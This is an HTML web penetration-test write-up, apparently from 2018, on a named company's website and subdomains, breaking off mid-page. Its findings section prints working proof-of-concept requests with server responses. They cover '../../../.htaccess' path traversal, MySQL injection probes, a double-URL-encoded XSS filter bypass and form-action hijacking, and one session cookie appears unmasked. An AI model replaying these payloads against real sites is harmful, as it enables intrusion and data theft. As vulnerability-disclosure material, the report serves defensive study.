<!DOCTYPE html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <!-- Bootstrap CSS -->
    <style type="text/css">
      .h-r{
       margin-top:10px;
       margin-bottom:10px;
       height:4px;
       width:100%;
       border-top:4px solid grey;
      }
    </style>
    <link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.6/css/bootstrap.min.css">
     <script type="text/javascript">
window.onload = function () {
// This is the graph
var chart = new CanvasJS.Chart("chartContainer",
    { animationEnabled: true,
      animationDuration: 2500,
      theme: "dark1",
      data: [
      {
        color: "LightSeaGreen",
       indexLabelPlacement: "outside",
       showInLegend: false,
       type: "doughnut",
       dataPoints: [
       {  y: 5, indexLabel:"High" , legendText: "High", color: "red" },
       {  y: 2, indexLabel:"Medium", legendText: "Medium", color: "darkorange" },
       {  y: 3, indexLabel:"Low", legendText: "Low",color: "grey" },
       ]
     }
     ]
   });

    chart.render();

}
  </script>
  <title>Report</title>
  </head>
  <body>
    <!-- START NAVBAR -->
    <nav class="navbar navbar-inverse p-2 mb-2 bg-danger sticky-top">
      <a class="navbar-brand" href="https://github.com/h0nus">Web Pentest Report by <kbd>Ivan Nicola Biagi - H0nus</kbd></a>
    </nav>
    <!-- END NAVBAR -->
    <!-- SUMMARY -->
    <div class="container-fluid">
      <div class="jumbotron-fluid">
        <div class="starter-template">
              <div class="p-2 mb-2 bg-danger text-white" data-toggle="collapse" data-target="#summary" aria-controls="summary"><h2>Summary  <button type="button" class="btn btn-sm btn-secondary">[Click me for infos]</button></h2></div>
        </div>
        <div id="summary" class="collapse hide" aria-labelledby="summary">
        <div class="card-body ">
        <ul class="list-group">
          <li class="list-group-item"><h5>Target:</h5><kbd> https://www.exprivia.it and some subdomains</kbd></li>
          <li class="list-group-item"><h5>Pentest:</h5><kbd> Web application pentest</kbd></li>
          <li class="list-group-item"><h5>Scope:</h5><kbd> https://www.exprivia.it/ | https://cas.exprivia.it/ | http://www.rapportiniweb.exprivia.it/ | http://elearning-ehit.exprivia.it/</kbd></li>
          <li class="list-group-item"><h5>Tools that helped me:</h5><kbd> BurpSuite Free Edition, python-builtwith</kbd></li>
          <li class="list-group-item"><h5>Level of risk:</h5><kbd> Critical</kbd></li>
          <li class="list-group-item"><h5>Level of exploitability:</h5><kbd>Medium</kbd></li>
          <li class="list-group-item"><h5>Made by:</h5><kbd> Ivan Nicola Biagi - H0nus</kbd></li>
        </ul><br>
      </div>
    </div>
      <div class="jumbotron-fluid">
       <div class="starter-template">
        <div class="p-2 mb-2 bg-danger text-white" data-toggle="collapse" data-target="#writeup" aria-expanded="true" aria-controls="writeup"><h2>Writeup  <button type="button" class="btn btn-sm btn-secondary">[Click me for infos]</button></h2></div>
          <!-- <h1 class="text-danger">Writeup</h1> -->
      </div>
       <div id="writeup" class="collapse hide" aria-labelledby="writeup">
      <div class="container-fluid ">
        <p><h4>My writeup will be divided in:</h4>
          <ul>
            <b><li>Websites first look & passive reconning/analyze</li>
            <li>Active analyze;</li>
            <li>Vulnerabilities reliability;</li>
            <li>Final thought;</li></b>
          </ul><br>
        <h4><b>Websites first look & passive reconning/analyze</b></h4>
        <h5>To start everything, I just browsed the website <var><u>https://www.exprivia.it</u></var> and looked around to find some useful infos (like emails, links, contacts or location too).<br>
        At first sight I undertood that the site was under a CMS. After some research and directory guessing for any administration panel or sensitive files I found <var>/it/cms/</var> directory where there is a login for <code><b>ZeroCMS</b></code> made by <b>Shiftzero &reg;</b> .<br>
        Then, I just fired up my <b>BurpSuite Free Edition </b>and started to crawl around the site; After a while I started to crawl the other subdomaind too and found many intteresting things.</h5><br>
        <h4><b>Passive Scanning</b></h4><br>
        <h5>While looking around the sites, I found many errors that leaded me to many <b>Informations Disclosure (</b>like on <var><b>https://www.exprivia.it/en/load-more-jobapps.php</b></var> where an <b>SQL Exception</b> is printed and make me know the backend database used: <b>MySQL)</b></h5>.
        Here is a list of informations per domain:<br><br>
          Domain: <code><b>https://www.exprivia.it/</b></code>
          <ul>
            <li>Built With:</li>
              <ul>
                <li>Mobile-frameworks: <code><b>jQuery Mobile</b></code></li>
                <li>Web-servers: <code><b>Apache/2.2.15 (CentOS)</b></code></li>
                <li>Javascript-frameworks: <code><b>jQuery, jQuery UI</b></code></li>
                <li>Powered by: <code><b>PHP/5.3.3</b></code></li>
              </ul>
            <li><b>Other Infos:</b>
              <ul>
                <li>Seems to use <code><b>ZeroCMS</b></code> from <code><b>Shiftzero&reg;</b></code> on a <code><b>CentOS</b></code> server</li>
              </ul>
            </li>
            </ul> 
          Domain: <code><b>http://elearning-ehit.exprivia.it</b></code>
            <ul>
              <li>Built With:</li>
                <ul>
                  <li>Web-servers: <code><b>Apache/2.2.3 (Red Hat)</b></code></li>
                  <li>Powered by: <code><b>PHP/5.3.3</b></code></li>
                  <li>Javascript-frameworks: <code><b>YUI</b></code></li>
                </ul>
              <li><b>Other Infos:</b>
                <ul>
                  <li>Seems to use <code><b>Red Hat server</b></code></li>
                </ul>
              </li>
              </ul>
          Domain: <code><b>https://cas.exprivia.it/</b></code>
            <ul>
              <li>Built With:</li>
                <ul>
                  <li>Web-servers: <code><b>Apache Tomcat/5.5.32 </b><var>(outdated)</var> over <b>IIS</b></code></li>
                </ul>
              <li><b>Other Infos:</b>
                <ul>
                  <li>Seems to use <code><b>Windows Server</b></code></li>
                </ul>
              </li>
              </ul> 
          Domain: <code><b>http://www.rapportiniweb.exprivia.it</b></code>
            <ul>
              <li>Built With:</li>
                <ul>
                  <li>Web-servers: <code><b>Microsoft-IIS/6.0</b><var> (outdated)</var></code></li>
                </ul>
              <li><b>Other Infos:</b>
                <ul>
                  <li>Seems to use <code><b>Windows Server</b></code></li>
                </ul>
              </li>
              </ul><br><br>
        <h4><b>Active analyze</b></h4>
        <h5>So, after some passive scanning, I just filtered the sitemap for only parameterized requests and fired up intruder with some payloads to find useful infos (like error information disclosure or sql error or etc..)<br>
        During the fuzzing I saw a strange response (on <code><var>/it/pageview.php</var></code>), I checked it and I realised that there was an <b>SQL Exception</b>. That error make me understand what backend sql server were in use (<b>MySQL</b>).<br>
        At the end I raised up some vulnerabilities (some of them are not listed beacuse they're not important).<br>
        To see all important findings, just skip down to <code><b>Vulnerabilities</b></code> and read.</h5><br>
        <h4><b>Vulnerabilities reliability</b></h4>
        <h5>I started with checking the possible vulnerabilities, and some of them are <b>difficult to exploit</b> but remain an high risk to the site affected.<br>
        I could verify the <b>FIle Path Manipulation</b> by accessing the file <b>.htacces</b> that by direct access I couldn't read it.<br>
        The <b>SQL Injection</b> is present, but could be not exploitable, because of the query made to the <b>MySQL</b> db.<br>
        The <b>XSS</b> is verified only if I encode the payload in URL/Percent encoding.<br>
        I could verify the <b>S.O.M.E</b> vulnerability because the <b><code>accordion</code></b>parameter is being used to define a function to execute in a Javascript context.<br>
        During the inspection on the domain <b><var>https://cas.exprivia.it</var></b> I saw that <b>Apache Tomcat 5.5.32</b> is used for the application, and this version is <b>outdated</b> and the <b>support has ended</b>.
        I discovered, then, that a form hijacking is possible on the <b><code>cl</code></b> parameter at <code><var>/en/pageview2.php</var></code> and if you inject anything it will be echoed unmodified in response into a form action URL.<br>
        Especially at <var><code>/it/pageview.php</code></var> I was trying some <b>SQL Injection</b> payloads. Form the responde differing I could understand that the web application was not sanitizing user input and that some <b>SSI</b> (<b>S</b>erver <b>S</b>ide <b>I</b>njection) could be possible, especially for <b>SQL</b> based injections; Luckly I remembered that before I had some <b>MySQL</b> errors, so I tried only <b>MySQL</b> based injections, and I got a really nice understaning of input handling.



        </p>
      </div>
    </div>
  </div>
  <!-- END SUMMARY -->
    <!-- VULNS -->
      <div class="jumbotron-fluid">
       <div class="starter-template">
          <div class="p-2 mb-2 bg-danger text-white" data-toggle="collapse" data-target="#graphss" aria-expanded="true" aria-controls="graphss"><h2>Vulnerabilities <button type="button" class="btn btn-sm btn-secondary">[Click me for infos]</button></h2></div>
    </div>
  </div>
  <div id="graphss" class="collapse hide" aria-labelledby="graphss">
  <div id="accordion">
    <div class="card">
      <div class="card-header" id="headingOne">
        <h5 class="mb-0">
          <button class="btn btn-link" id="1" data-toggle="collapse" data-target="#collapseOne" aria-expanded="true" aria-controls="collapseOne">
            <span class="badge badge-danger">High</span> <b>File Path Manipulation</b><br>
          </button>
        </h5>
      </div>
      <div id="collapseOne" class="collapse hide" aria-labelledby="headingOne" data-parent="#accordion">
        <div class="card-body container-fluid">
  <p class="text-left">
  <b>Host affected</b>:<br>
  <code><b>https://www.exprivia.it/</b></code><br>
  <b>Path</b>:<br>
  <code><b>/exprivia-resources/download.php</b></code><br>
  <b>Issue detail</b>:<br>
  The <var><b>file_basename</b></var> parameter appears to be vulnerable to file path manipulation attacks.<br>
  The payload ../../../.htaccess was submitted in the insertion point. The file .htaccess was returned.<br>
  <b>Issue background</b>:<br>
  File path manipulation vulnerabilities arise when user-controllable data is placed into a file or URL path that is used on the server to access local resources, which may be within or outside the web root. If vulnerable, an attacker can modify the file path to access different resources, which may contain sensitive information. Even where an attack is constrained within the web root, it is often possible to retrieve items that are normally protected from direct access, such as application configuration files, the source code for server-executable scripts, or files with extensions that the web server is not configured to serve directly.<br><br>
  <b>Proof of Concept request</b>:
  <pre>
  GET /exprivia-resources/download.php?file_basename=../../../.htaccess HTTP/1.1
  Host: www.exprivia.it
  Accept-Encoding: gzip, deflate
  Accept: */*
  Accept-Language: en
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  Connection: close
  Referer: https://www.exprivia.it/it/240/at-a-glance.php
  Cookie: PHPSESSID=********************; accept_cookie=yes
  </pre>
  <b>Response</b>:
  <pre>
  HTTP/1.0 200 OK
  Date: Sat, 27 Jan 2018 16:37:18 GMT
  Server: Apache/2.2.15 (CentOS)
  X-Powered-By: PHP/5.3.3
  Content-Disposition: attachment; filename=".htaccess"
  <b>...[SNIP]...</b>
  RewriteEngine On

  RewriteCond %{HTTP_HOST} ^exprivia.com [NC,OR]
  RewriteCond %{HTTP_HOST} ^www.exprivia.com$ [NC]
  RewriteRule ^(.*)$ http://www.exprivia.it/en/ [L,R=301,NC]

  RewriteCond %{HTTP_HOST} ^exprivia.es [NC,OR]
  RewriteCond %{HTTP_HOST} ^www.exprivia.es [NC]
  RewriteRule ^(.*)$ http://www.exprivia.it/es/ [L,R=301,NC]

  RewriteCond %{HTTP_HOST} !^www\.
  RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]

  #Redirect 301 /ita/ http://www.exprivia.it/it/
  RewriteRule ^ita/((?!(docs|img|jcider|cms/exprivia-cms)).*)$ /it/ [R=301,NC,L]
  <b>...[SNIP]...</b>
  Options -Indexes
  </pre><br>
  <b>Screenshot</b>:<br>
  <img src="screens/exprivia-1.png"></p>
        </div>
      </div>
    </div>
    <div class="card">
      <div class="card-header" id="headingNine">
        <h5 class="mb-0">
          <button class="btn btn-link collapsed" data-toggle="collapse" data-target="#collapseNine" aria-expanded="false" aria-controls="collapseNine">
            <span class="badge badge-danger">High</span> <b>Same Origin Method Execution</b><br>
          </button>
        </h5>
      </div>
      <div id="collapseNine" class="collapse" aria-labelledby="headingNine" data-parent="#accordion">
        <div class="card-body container-fluid">
  <p class="text-left">
  <b>Host affected</b>:<br>
  <code><b>https://www.exprivia.it</b></code><br>
  <b>Issue detail</b>:<br>
  Same Origin Method Execution might be possible. This is rated as high severity because it appears the callback parameter is specifying which method to directly call in the response under a Javascript context.<br>
  Same Origin Method Execution occurs when a parameter is being used to define a function to execute in a Javascript context. Normally, this occurs with JSONP and Flash endpoints as they contain a 'callback' parameter.<br>
  <b>Proof of concept request</b>:
  <pre>
  POST /it/ HTTP/1.1
  Host: www.exprivia.it
  Accept-Encoding: gzip, deflate
  Accept: */*
  Accept-Language: en
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  Connection: close
  Referer: https://www.exprivia.it/it/jquery_php/generic_cv_submission.php
  Content-Type: multipart/form-data; boundary=--------449364356
  Content-Length: 1562
  Cookie: PHPSESSID=opdk4lvggtfgjqlkjk0v9iuvt2
  <b>...[SNIP]...</b>
  </pre><br>
  <b>Repsponse</b>:
  <pre>
  HTTP/1.0 302 Found
  Date: Sat, 27 Jan 2018 16:12:10 GMT
  Server: Apache/2.2.15 (CentOS)
  X-Powered-By: PHP/5.3.3
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Pragma: no-cache
  Location: http://www.exprivia.it/en/
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  <b>...[SNIP]...</b>
        });

  &lt;/script&gt;
  &lt;script&gt;
    $(function() {
      $( &quot;#accordion&quot; ).accordion({
        heightStyle: &quot;content&quot;,
        collapsible: true,
        active: false
      });
    });
    &lt;/script&gt;


  &lt;script src=&quot;/it/js/jquery.dotdotdot.min.js&quot;&gt;&lt;/script&gt;
  </p>
</pre><br>
        </div>
      </div>
    </div>
    <div class="card">
      <div class="card-header" id="headingTwo">
        <h5 class="mb-0">
          <button class="btn btn-link collapsed" data-toggle="collapse" data-target="#collapseTwo" aria-expanded="false" aria-controls="collapseTwo">
            <span class="badge badge-danger">High</span> <b>SQL Injection</b><br>
          </button>
        </h5>
      </div>
      <div id="collapseTwo" class="collapse" aria-labelledby="headingTwo" data-parent="#accordion">
        <div class="card-body container-fluid">
  <p class="text-left">
  <b>Host affected</b>:<br>
  <code><b>https://www.exprivia.it/</b></code><br>
  <b>Path</b>:<br>
  <code><b>/it/pageview.php</b></code><br>
  <b>Issue detail</b>:<br>
  The <var><b>i</b></var> parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the i parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.<br>
  The database appears to be <b>MySQL</b>.<br>
  <b>Issue background</b>:<br>
  SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
  A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.<br><br>
  <b>Proof of concept request</b>:
  <pre>
  GET /it/pageview.php?i=132&cl=1' HTTP/1.1
  Host: www.exprivia.it
  Accept-Encoding: gzip, deflate
  Accept: */*
  Accept-Language: en
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  Connection: close
  Referer: https://www.exprivia.it/it/132/cookie-and-privacy-policy.php
  Cookie: PHPSESSID=********************; accept_cookie=yes
  </pre><br>
  <b>Repsponse</b>:
  <pre>
  HTTP/1.0 200 OK
  Date: Sat, 27 Jan 2018 19:41:57 GMT
  Server: Apache/2.2.15 (CentOS)
  X-Powered-By: PHP/5.3.3
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Pragma: no-cache
  Content-Length: 885
  Connection: close
  Content-Type: text/html; charset=iso-8859-1

  <b>...[SNIP]...</b>
  Invalid SQL: SELECT h1 FROM sections WHERE section_id='132''<br>
  <b>MySQL Error</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''132''' at line 1)<br>
  Session stopped.
  </p>
</pre><br>
  <b>Screenshot</b>:<br>
  <img src="screens/exprivia-2.png"></p>
        </div>
      </div>
    </div>
    <div class="card">
      <div class="card-header" id="headingX">
        <h5 class="mb-0">
          <button class="btn btn-link collapsed" data-toggle="collapse" data-target="#collapseX" aria-expanded="false" aria-controls="collapseX">
            <span class="badge badge-danger">High</span> <b>End of Life Software - Apache Tomcat 5.5.32</b><br>
          </button>
        </h5>
      </div>
      <div id="collapseX" class="collapse" aria-labelledby="headingX" data-parent="#accordion">
        <div class="card-body container-fluid">
  <p class="text-left">
  <b>Host affected</b>:<br>
  <code><b>https://cas.exprivia.it</b></code><br>
  <b>Path</b>:<br>
  <code><b>/</b></code><br>
  <b>Issue detail</b>:<br>
  There is an unsupported release of Apache Tomcat 5.5.32.<br>
  No more security updates for this version will be released by Apache.<br><br>
  <b>Proof of concept request</b>:
  <pre>
  GET / HTTP/1.1
  Host: cas.exprivia.it
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Cookie: org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=it
  DNT: 1
  Connection: close
  Upgrade-Insecure-Requests: 1
  </pre><br>
  <b>Repsponse</b>:
  <pre>
  HTTP/1.1 200 OK
  Date: Sat, 03 Feb 2018 01:06:56 GMT
  Server: Apache-Coyote/1.1
  Content-Type: text/html;charset=ISO-8859-1
  Connection: close
  Content-Length: 8932

  <b>...[SNIP]...</b>
  &lt;head&gt;
  &lt;title&gt;Apache Tomcat/5.5.32&lt;/title&gt;
  &lt;style type=&quot;text/css&quot;&gt;
  <b>...[SNIP]...</b>
  </pre>
        </div>
      </div>
    </div>
    <div class="card">
      <div class="card-header" id="headingTwo">
        <h5 class="mb-0">
          <button class="btn btn-link collapsed" data-toggle="collapse" data-target="#collapseThree" aria-expanded="false" aria-controls="collapseThree">
            <span class="badge badge-danger">High</span> <b>Cross-site scripting reflected [1]</b><br>
          </button>
        </h5>
      </div>
      <div id="collapseThree" class="collapse" aria-labelledby="headingThree" data-parent="#accordion">
        <div class="card-body container-fluid">
  <p class="text-left">
  <b>Issue detail</b>:<br>
  The value of the <var><b>cl</b></var> request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. 
  The payload <code><b>qz9ez%3c%2fscript%3e%3cscript%3ealert%281%29%3c%2fscript%3ef60ie</b></code> was submitted in the cl parameter. This input was echoed as <b><code>qz9ez&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;f60ie</code></b> in the application's response.<br>
  This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.<br>
  The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by applying superfluous URL-encoding to the required characters - for example, by submitting %253c instead of the <b><code><</code></b> character.<br>
  Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.<br>
  <b>Issue background</b>:<br>
  Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.<br>
  The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.<br>
  Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site that causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).<br>
  The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality that it contains, and the other applications that belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain that can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization that owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application and exploiting users' trust in the organization in order to capture credentials for other applications that it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.<br><br>
  <b>Proof of concept request</b>:
  <pre>
  GET /it/pageview.php?i=132&cl=1vk1j2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eu5g3o HTTP/1.1
  Host: www.exprivia.it
  Accept-Encoding: gzip, deflate
  Accept: */*
  Accept-Language: en
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  Connection: close
  Referer: https://www.exprivia.it/it/132/cookie-and-privacy-policy.php
  Cookie: PHPSESSID=********************; accept_cookie=yes
  </pre><br>
  <b>Repsponse</b>:
  <pre>
  HTTP/1.0 200 OK
  Date: Mon, 12 Feb 2018 16:33:59 GMT
  Server: Apache/2.2.15 (CentOS)
  X-Powered-By: PHP/5.3.3
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Pragma: no-cache
  Connection: close
  Content-Type: text/html; charset=iso-8859-1

  <b>...[SNIP]...</b>
  media="screen" />
  &lt;script type=&quot;text/javascript&quot; src=&quot;/it/fancybox/source/helpers/jquery.fancybox-thumbs.js?v=1.0.7&quot;&gt;&lt;/script&gt;

  &lt;!-- ////////// FANCYBOX END ////////// --&gt;&lt;link rel=&quot;canonical&quot; href=&quot;/it/132vk1j2\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;u5g3o/cookie-and-privacy-policy.php&quot; /&gt;&lt;/head&gt;
  <b>...[SNIP]...</b>
  </pre><br>
  <b>Screenshot</b>:<br>
  <img src="screens/exprivia-3.png">
  </p>
        </div>
      </div>
    </div>
    <div class="card">
      <div class="card-header" id="headingFour">
        <h5 class="mb-0">
          <button class="btn btn-link" data-toggle="collapse" data-target="#collapseFour" aria-expanded="true" aria-controls="collapseFour">
            <span class="badge badge-warning">Medium</span><b> Form action hijacking reflected</b><br>
          </button>
        </h5>
      </div>
      <div id="collapseFour" class="collapse hide" aria-labelledby="headingFour" data-parent="#accordion">
        <div class="card-body container-fluid">
  <p class="text-left">
  <b>Host affected</b>:<br>
  <code><b>https://www.exprivia.it/</b></code><br>
  <b>Path</b>:<br>
  <code><b>/en/pageview2.php</b></code><br>
  <b>Issue detail</b>:<br>
  The value of the <var><b>cl</b></var> request parameter is copied into the response within the path of a form action URL.<br>
  The payload <var><b>wqmyw1k9f0</b></var> was submitted in the <var><b>cl</b></var> parameter.<br>
  This input was echoed unmodified within a form action URL.<br>
  This proof-of-concept attack demonstrates that it is possible to modify the form action to reference an arbitrary path.<br>
  <b>Issue background</b>:<br>
  Form action hijacking vulnerabilities arise when an application places user-supplied input into the action URL of an HTML form. An attacker can use this vulnerability to construct a URL that, if visited by another application user, will modify the action URL of a form to point to the attacker's server. If a user submits the form then its contents, including any input from the victim user, will be delivered directly to the attacker.<br>
  Even if the user doesn't enter any sensitive information, the form may still deliver a valid CSRF token to the attacker, enabling them to perform CSRF attacks. In some cases web browsers may help exacerbate this issue by autocompleting forms with previously entered user input.<br><br>
  <b>Proof of Concept request</b>:
  <pre>
  GET /en/pageview2.php?i=1385&cl=1wqmyw1k9f0 HTTP/1.1
  Host: www.exprivia.it
  Accept-Encoding: gzip, deflate
  Accept: */*
  Accept-Language: en
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  Connection: close
  Referer: https://www.exprivia.it/it/stai-cercando-la-tua-via/1385/per-lavorare-in-exprivia.php
  Cookie: PHPSESSID=********************; accept_cookie=yes
  </pre>
  <b>Response</b>:
  <pre>
  HTTP/1.0 200 OK
  Date: Sat, 27 Jan 2018 19:39:24 GMT
  Server: Apache/2.2.15 (CentOS)
  X-Powered-By: PHP/5.3.3
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Pragma: no-cache
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  <b>...[SNIP]...</b>
  &lt;/div&gt;
  &lt;div id=&quot;form-container&quot; class=&quot;form-container variant&quot;&gt;
  &lt;form name=&quot;brochure-request&quot; method=&quot;post&quot; action=&quot;/en/are-you-looking-for-your-path/1385wqmyw1k9f0/work-at-exprivia.php&quot; enctype=&quot;multipart/form-data&quot;&gt;
  &lt;input name=&quot;action&quot; type=&quot;hidden&quot; value=&quot;send&quot;&gt;
  &lt;input name=&quot;generic&quot; type=&quot;hidden&quot; value=&quot;yes&quot;&gt;
  <b>...[SNIP]...</b>
  </pre><br>
        </div>
      </div>
    </div>
  <div class="card">
      <div class="card-header" id="headingFive">
        <h5 class="mb-0">
          <button class="btn btn-link" data-toggle="collapse" data-target="#collapseFive" aria-expanded="true" aria-controls="collapseFive">
            <span class="badge badge-warning">Medium</span><b> Interesting input handling: MySQL injection</b><br>
          </button>
        </h5>
      </div>
      <div id="collapseFive" class="collapse hide" aria-labelledby="headingFive" data-parent="#accordion">
        <div class="card-body container-fluid">
  <p class="text-left">
  <b>Host affected</b>:<br>
  <code><b>https://www.exprivia.it/</b></code><br>
  <b>Path</b>:<br>
  <code><b>/it/pageview.php</b></code><br>
  <b>Issue detail</b>:<br>
  The application reacts to inputs in a way that suggests it might be vulnerable to some kind of server-side code injection. The probes are listed below in chronological order, with evidence. Response attributes that only stay consistent in one probe-set are italicised, with the variable attribute starred.<br>
  <table class="table table-bordered table-inverse">
    <thead>
      <tr>
        <th>MySQL injection</th>
        <th><code>'||power(unix_timestampp(),0)||'</code></th>
        <th><code>'||power(unix_timestamp(),0)||'</code></th>
      </tr>
    </thead>
    <tbody>
      <tr>
        <th scope="row">status_code</th>
        <td>200</td>
        <td>301</td>
      </tr>
      <tr>
        <th scope="row">error</th>
        <td>2</td>
        <td>0</td>
      </tr>
      <tr>
        <th scope="row">visible_word_count</th>
        <td>21</td>
        <td>0</td>
      </tr>
      <tr>
        <th scope="row">line_count</th>
        <td>15</td>
        <td>13</td>
      </tr>
      <tr>
        <th scope="row">tag_names</th>
        <td>X</td>
        <td>Y</td>
      </tr>
      <tr>
        <th scope="row">invalid</th>
        <td>1</td>
        <td>0</td>
      </tr>
      <tr>
        <th scope="row">visible_text</th>
        <td>*X*</td>
        <td>Y</td>
      </tr>
      <tr>
        <th scope="row">word_count</th>
        <td>67</td>
        <td>*48*</td>
      </tr>
      <tr>
        <th scope="row">location</th>
        <td>0</td>
        <td>*Y*</td>
      </tr>
    </tbody>
  </table>
  <b>Proof of Concept request <code>1</code></b>:
  <pre>
  GET /it/pageview.php?cl=1&i=132scmhf6'||power(unix_timestanp(),0)||' HTTP/1.1
  Host: www.exprivia.it
  Accept-Encoding: gzip, deflate
  Accept: */*
  Accept-Language: en
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  Connection: close
  Referer: https://www.exprivia.it/it/132/cookie-and-privacy-policy.php
  Cookie: PHPSESSID=********************; accept_cookie=yes
  </pre>
  <b>Response <code>1</code></b>:
  <pre>
  HTTP/1.0 200 OK
  Date: Sat, 27 Jan 2018 19:14:36 GMT
  Server: Apache/2.2.15 (CentOS)
  X-Powered-By: PHP/5.3.3
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Pragma: no-cache
  Content-Length: 825
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  <b>...[SNIP]...</b>
  &lt;meta http-equiv=&quot;content-language&quot; content=&quot;it&quot; /&gt;
  &lt;!-- test --&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;b&gt;Database error:&lt;/b&gt; Invalid SQL: SELECT h1 FROM sections WHERE section_id=&apos;132scmhf6&apos;||power(unix_timestanp(),0)||&apos;&apos;&lt;br&gt;
  &lt;b&gt;MySQL Error&lt;/b&gt;: 1305 (FUNCTION dbIT_cms_exprivia.unix_timestanp does not exist)&lt;br&gt;
  Session stopped.
  </pre><br>
  <b>Proof of Concept request <code>2</code></b>:
  <pre>
  GET /it/pageview.php?cl=1&i=132j4bzvw0'||power(unix_timestamp(),0)||' HTTP/1.1
  Host: www.exprivia.it
  Accept-Encoding: gzip, deflate
  Accept: */*
  Accept-Language: en
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  Connection: close
  Referer: https://www.exprivia.it/it/132/cookie-and-privacy-policy.php
  Cookie: PHPSESSID=********************; accept_cookie=yes
  </pre>
  <b>Response <code>2</code></b>:
  <pre>
  HTTP/1.0 301 Moved Permanently
  Date: Sat, 27 Jan 2018 19:14:19 GMT
  Server: Apache/2.2.15 (CentOS)
  X-Powered-By: PHP/5.3.3
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Pragma: no-cache
  Location: /it/132j4bzvw0'||power(unix_timestamp(),0)||'/contatti.php/&cl=1
  Content-Length: 579
  Connection: close
  Content-Type: text/html; charset=iso-8859-1<br>

  &lt;!DOCTYPE html&gt;
  &lt;html lang=&quot;it&quot;&gt;
  &lt;head&gt;
   
  &lt;title&gt;Cookie &amp; Privacy Policy&lt;/title&gt;
  &lt;meta http-equiv=&quot;X-UA-Compatible&quot; content=&quot;IE=10,chrome=1&quot; /&gt;
  &lt;!-- &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=UTF-8&quot; /&gt; --&gt;
  &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=iso-8859-1&quot; /&gt;
  <b>...[SNIP]...</b>
  </pre><br>
        </div>
      </div>
    </div>
    <div class="card">
      <div class="card-header" id="headingSev">
        <h5 class="mb-0">
